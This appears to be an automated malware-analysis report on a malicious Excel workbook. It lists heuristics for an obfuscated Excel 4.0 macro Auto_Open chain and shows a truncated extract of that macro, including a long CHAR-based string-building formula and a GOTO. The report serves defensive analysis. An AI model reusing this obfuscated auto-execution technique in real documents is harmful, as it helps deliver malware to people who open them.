MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains critical heuristics indicating the presence of obfuscated Excel 4.0 (XLM) macros with an Auto_Open execution chain. The macro sheet contains a formula that appears to be constructing a string using CHAR functions, suggesting it's designed to execute arbitrary code. This is a common technique for downloading and executing secondary payloads.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAINExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 130450 bytes |
SHA-256: c2eb1d7ec24c9c4798149bb2cae7234587c2f02f589b9a57c46bea19eb3e062a |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!FJ11349 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,B7,"",0.23875432525951556517 ' Sheet,FS8,"",-1.97826086956521729476 ' Sheet,CL22,"",221.00000000000000000000 ' Sheet,GL26,"",-16.00000000000000000000 ' Sheet,BC64,"",8.25000000000000000000 ' Sheet,R101,"",1.71929824561403510330 ' Sheet,EK168,"",-0.05208333333333333565 ' Sheet,FG174,"",-220.00000000000000000000 ' Sheet,FX234,"",6.54545454545454585826 ' Sheet,GB261,"",-358.00000000000000000000 ' Sheet,EE304,"",282.00000000000000000000 ' Sheet,EA306,"FORMULA(CHAR(JS34936*JR19839)&CHAR(JS34936/JR56622)&CHAR(FI61712/GD21329)&CHAR(JK42538-IM16023)&CHAR(GT57598+JB2723)&CHAR(BB31470*BS30509)&CHAR(EB22154-DK62598)&CHAR(FI61712-GQ49124)&CHAR(GT57598/HU49493)&CHAR(GT57598+GS55861)&CHAR(CU22882*C28485)&CHAR(EB22154+DS54034)&CHAR(EB22154-JI6896)&CHAR(JS34936+HC59903)&CHAR(EB22154+GA1474)&CHAR(BB31470+BZ40084)&CHAR(FI61712*EB9194)&CHAR(CL59014+FX1451)&CHAR(GT57598+FL39026)&CHAR(BB31470-BB26061)&CHAR(EB22154*EQ56688)&CHAR(JK42538+HY11871)&CHAR(GT57598+CD50959)&CHAR(FH54644/DN15628)&CHAR(JS34936+K62218)&CHAR(FI61712/HD32835)&CHAR(CL59014*BK28780)&CHAR(FH54644+GZ8261)&CHAR(JS34936/EB46190)&CHAR(A12310+CG18454)&CHAR(GT57598/GY54530)&CHAR(GT57598*M3744)&CHAR(JS34936-IG10933)&CHAR(GT57598/IE34244)&CHAR(JK42538+IV9902)&CHAR(CL59014/S53528)&CHAR(FH54644/Y14262)&CHAR(GT57598+JK16432)&CHAR(JK42538-HG39353)&CHAR(CU22882-ER44220)&CHAR(BB31470*EW28960)&CHAR(JK42538*DZ47054)&CHAR(FI61712-IT25084)&CHAR(JK42538-DH24161)&CHAR(GT57598/IZ16786)&CHAR(BB31470+JO39807)&CHAR(GT57598*IS14107)&CHAR(BB31470+Q55691)&CHAR(EB22154*FS8)&CHAR(CU22882+EM57411)&CHAR(BB31470+EV32212)&CHAR(BB31470/U26676)&CHAR(BB31470+EG65308)&CHAR(A12310*EG26271)&CHAR(EB22154/II37236)&CHAR(CU22882*JT61600)&CHAR(CL59014/JT42964)&CHAR(CU22882+EN62282)&CHAR(FH54644+FU3759)&CHAR(A12310+HB55921)&CHAR(GT57598/EZ59223)&CHAR(A12310-IP44694)&CHAR(GT57598-II34127)&CHAR(GT57598*FZ63665)&CHAR(FH54644+HZ20634)&CHAR(A12310/CT10458)&CHAR(JS34936/P24528)&CHAR(FH54644-CE46338)&CHAR(A12310/FH35775)&CHAR(CL59014-DL50903)&CHAR(A12310+BK59363)&CHAR(CU22882-EW43941)&CHAR(JK42538*IR48789)&CHAR(JK42538*EC60156)&CHAR(EB22154*GS13493)&CHAR(BB31470/GG14558)&CHAR(FI61712/IU8801)&CHAR(BB31470*ES14222)&CHAR(FI61712+BY15605),EA307)","" ' Sheet,EA308,GOTO(ET38395),"" ' Sheet,BA340,"",-6.74426229508196684037 ' Sheet,CQ366,"",324.00000000000000000000 ' Sheet,HV514,"",-382.00000000000000000000 ' Sheet,GN577,"",-238.00000000000000000000 ' Sheet,JU597,"",-6.01265822784810133328 ' Sheet,BW637,"",-316.00000000000000000000 ' Sheet,GR657,"",4.12857042857142886305 ' Sheet,CV702,"",-3.31578947368421061981 ' Sheet,I718,"",212.40015625000000909495 ' Sheet,FH719,"",3.89130434782608691791 ' Sheet,DP722,"",-335.00000000000000000000 ' Sheet,FM741,"",-487.40031249999998408384 ' Sheet,W766,"",829.00000000000000000000 ' Sheet,DW817,"",0.08947368421052631637 ' Sheet,U824,"",-0.01745795188418139410 ' Sheet,JU837,"",-280.00000000000000000000 ' Sheet,DI849,"",-0.64788732394366199685 ' Sheet,CG862,"",-128.00000000000000000000 ' Sheet,BC865,"",-0.14062500000000000000 ' Sheet,BB867,"",-10.79545454545454497008 ' Sheet,EA896,"",-0.31271477663230240474 ' Sheet,EF896,"",-0.66423357664233573239 ' Sheet,JC917,"",184.00000000000000000000 ' Sheet,EF970,"",314.00000000000000000000 ' Sheet,IP1152,"",-152.25000000000000000000 ' Sheet,IL1161,"",-454.40031249999998408384 ' Sheet,CK1189,"",-0.16465863453815260398 ' Sheet,FM1247,"",-278.00000000000000000000 ' Sheet,CT1312,"",-2.39240506329113911121 ' Sheet,EQ1319,"",-0.08631578947368420685 ' Sheet,IX1347,"",358.00000000000000000000 ' Sheet,GZ1349,"",-2.56551824137931028247 ' ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.